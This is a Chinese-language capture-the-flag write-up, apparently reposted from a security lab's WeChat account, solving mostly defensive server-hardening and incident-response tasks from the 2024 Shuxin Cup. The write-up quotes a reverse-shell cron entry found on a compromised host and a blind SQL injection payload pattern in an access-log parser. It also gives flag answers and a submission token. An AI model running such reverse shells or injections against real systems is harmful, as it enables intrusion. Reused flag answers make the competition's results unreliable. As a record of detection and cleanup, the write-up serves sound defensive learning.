回复”2024数信杯西区附件“获取文件下载链接,本次比赛大部分题目都在服务器上,所以只有一些log和病毒分析、流量分析的题目文件。
门户网站
1.SSH 配置(check)
1、修改/etc/ssh/sshd_config文件
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
删除.sshd/authorized_keys2文件
完成后,重启 ssh 服务
service ssh restart2.apache 的安全策略配置(check)
修改/etc/apache2/apache2.conf文件
ServerTokens Prod
ServerSignature Off
在配置文件中,将<Directory />目录配置中不安全的修改项进行修改
<Directory />
Options Indexes FollowSymLinks
AllowOverride None
Require all denied
</Directory>
`Options Indexes FollowSymLinks`允许启动目录索引,进行修改
`Options FollowSymLinks`
修改完成后,进行重启3.mysql 数据库增量回复(check)
OA 系统
1.redis 加固(check)
在配置文件中找到 # requirepass foobared 这一行,去掉前面的 # 注释符号,并将其设置为 requirepass 6b95fa87
修改bind 0.0.0.0 为bind 127.0.0.1限制本地访问
redis-server /etc/redis/redis.2.webshelll 分析(check)
河马查杀webshell
3.蚁剑流量分析(flag)
分析蚁剑流量,解密base64
flag{FC0F33EF-4599-D30E-F6DF-EE9660A9DAD1}4.后门发现(flag)
netstat -ano 发现了一个外链
flag{121.13.2.33:5432}5.后门清除(check)
ps -aux 发现了一个可疑的psql ,然后跟踪psql
cd /proc/PID
ll exe
发现在/usr/bin/python3.66.文件解密(flag)
7.数据库恢复(check)
即时协作服务器
1.弱口令修改(check)
直接上后台修改
2.hsqldb 数据迁移 mysql(check)
3.身份认证绕过漏洞修复(check)
直接修改openfire的openfire.xml
root@16bb35eba610:/home/user/openfire/conf# sed -i 's/<port>9090</port>/<port>12335</port>/g' openfire.xml
root@16bb35eba610:/home/user/openfire/conf# cat conf/openfire.xml | grep port
cat: conf/openfire.xml: No such file or directory
root@16bb35eba610:/home/user/openfire/conf# cat openfire.xml | grep port
<!-- Disable either port by setting the value to -1 -->
<port>12335</port> 攻击者机器
1.thinkphp rce(flag)
有disable_func,直接用readfile读文件
个人文件系统
1. nginx日志分析
读取文件/var/log/nginx/access.log,看到是布尔盲注的日志,写脚本提取:
import re
def extract_data_from_logs(file_path):
data = {}
ascii_pattern = re.compile(r'ascii(substr((select(group_concat(flag))from(flag)),(d+),1))>(d+)')
response_pattern = re.compile(r'HTTP/1.1" 200 (d+)')
# Read the entire log file
with open(file_path, 'r') as file:
logs = file.readlines()
for line in logs:
ascii_match = ascii_pattern.search(line)
response_match = response_pattern.search(line)
if ascii_match and response_match:
# Extract character position, ASCII comparison value, and response size
position = int(ascii_match.group(1))
ascii_value = int(ascii_match.group(2))
response_size = int(response_match.group(1))
# Initialize dictionary for position if not exists
if position not in data:
data[position] = []
# Append tuple of (ascii_value, true/false)
data[position].append((ascii_value, response_size == 940))
# Reconstruct the data by determining the ASCII value for each position
reconstructed_data = {}
for pos, values in data.items():
# Sort values and use binary search logic to determine the correct character
values.sort()
low, high = 0, 127 # ASCII printable range
for ascii_value, is_true in values:
if is_true:
low = max(low, ascii_value + 1)
else:
high = min(high, ascii_value)
# Assign the determined character to the position
reconstructed_data[pos] = chr(low)
# Convert the dictionary to string sorted by position
result = ''.join(reconstructed_data[pos] for pos in sorted(reconstructed_data))
return result
# Call the function and extract the injected data
extracted_data = extract_data_from_logs(log_file_path)
extracted_data
得到flag{W0w_y0u_f1nd_a7tack_1n_acc3ss_log_BFSFDC#@DS}
2. 计划任务日志分析
root@245e7643a7df:/# cat /etc/cron.d/*
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
* * * * * root bash -i >& /dev/tcp/8.8.36.233/9001 0>&1flag{8.8.36.233:9001}
3.计划任务清除(check)
root@245e7643a7df:/# rm /etc/cron.d/safeline 然后kill了cron进程
4.sudo 组后门(check)
root@245e7643a7df:/# getent group sudo
sudo:x:27:
root@245e7643a7df:/# getent group
h4ck:x:1000:
root@245e7643a7df:/# getent group root
root:x:0:
root@245e7643a7df:/# getent group h4ck
h4ck:x:1000:
root@245e7643a7df:/# deluser h4ck
Removing user `h4ck' ...
Warning: group `h4ck' has no more members.
Done.
root@245e7643a7df:/# 5.suid 清除(check)
root@245e7643a7df:/# find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/zsh
/usr/bin/sudo
chmod u-s zsh邮件服务器
1.冗余邮箱发现(flag)
上mysql查,看配置文件mysql的密码是mysql,提取出来写脚本比对
import pandas as pd
def read_emails_from_excel(file_path):
df = pd.read_excel(file_path, engine='openpyxl')
# 假设邮箱列名为"邮箱",并转换为小写
return [email.lower() for email in df['邮箱'].dropna()]
email_list = read_emails_from_excel('员工.xlsx')
# print(email_list)
print(len(email_list))
def read_emails_from_txt(file_path):
with open(file_path, 'r') as file:
# 读取每行,去除首尾空白,并转换为小写
emails = [line.strip().lower() for line in file.readlines()]
return emails
db_emails = read_emails_from_txt('mysql_data.txt')
print(len(db_emails))
for i in db_emails:
if i not in email_list:
print(i)
print(db_emails.index(i))➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{[email protected]}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"already_solved","msg":"flag accpeted! But you have already solved this problem before"}%2.钓鱼邮件发现(flag)
下载出来全部文件,搜索gophish fish的时候查到这个文件:
3.钓鱼邮件分析溯源(flag)
提交上面文件的开头的邮箱:
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{[email protected]}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"already_solved","msg":"flag accpeted! But you have already solved this problem before"}%4.恶意病毒分析_1(flag)
字符串通过xor base64 凯撒密码进行了加密,解密脚本:
import base64
def decrypt_caesar_cipher(text, shift):
"""
解密凯撒密码
:param text: 加密后的文本(字符串)
:param shift: 移位数(整数)
:return: 解密后的文本(字符串)
"""
decrypted_text = ""
for char in text:
if char.isalpha(): # 检查字符是否为字母
# 获取字母的起始ASCII码,大写字母为65,小写字母为97
start = 65 if char.isupper() else 97
# 减去起始ASCII码后再左移shift位,并通过取模操作确保字母循环
shifted = (ord(char) - start - shift) % 26
# 将处理后的ASCII码转回字符,并添加到结果中
decrypted_text += chr(start + shifted)
else:
# 非字母字符保持不变
decrypted_text += char
return decrypted_text
def decrypt(inputstr):
result = ''
for i in inputstr:
result += chr(ord(i) ^ 0x18)
result += (len(result) % 4) * '='
result = base64.b64decode(result).decode()
result = decrypt_caesar_cipher(result, 17)
return result
strlist = [
'B*t.z@hr|vp*Wrh)|vVk}Y',
'A*ha|O`sBbw.A*haQ[!v{ul(}IZ',
'yvJ-y+RiAuw',
'T+Jh|vRj|qYny*M',
'QsJ.|_tuyuB+y)B)}PBUB+Nay+BT{uhqJPR(}@ht|tR,|uNjQqYny*s',
'Q[!i|[Z){vhr{[Ynyuk',
'ULM.ULI.UY',
'T*trQPt.}Pt*yuk',
'T+{Y',
]
for i in strlist:
print(decrypt(i))解密出来后可以看到计划任务命令:
5.恶意病毒分析_2(flag)
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:windowssystem32zvzvxngm.exe}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"invalid_flag","msg":"invalid flag, hack harder"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:windowssystem32zvzvxngm}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"invalid_flag","msg":"invalid flag, hack harder"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{C:WindowsSystem32zvzvxngm.exe}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"invalid_flag","msg":"invalid flag, hack harder"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:windowssystem32}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"flag_capture_exception","msg":"failed to handle flag capture, please contact system admin"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:windowssystem32}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"already_solved","msg":"flag accpeted! But you have already solved this problem before"}%
➜ 24sxb6.恶意流量分析(flag)
算法题
import cv2
import numpy as np
# 读取原始图片
image = cv2.imread('embedded.png')
# 生成高斯噪声
mean = 0
sigma = 3 # 方差,可调整
gaussian = np.random.normal(mean, sigma, image.shape)
# 将噪声添加到图片
noisy_image = image + gaussian
# 确保像素值在0-255之间
noisy_image = np.clip(noisy_image, 0, 255).astype(np.uint8)
# 保存处理后的图片
cv2.imwrite('processed_image.png', noisy_image)
原文始发于微信公众号(BeFun安全实验室):2024数信杯西区题解
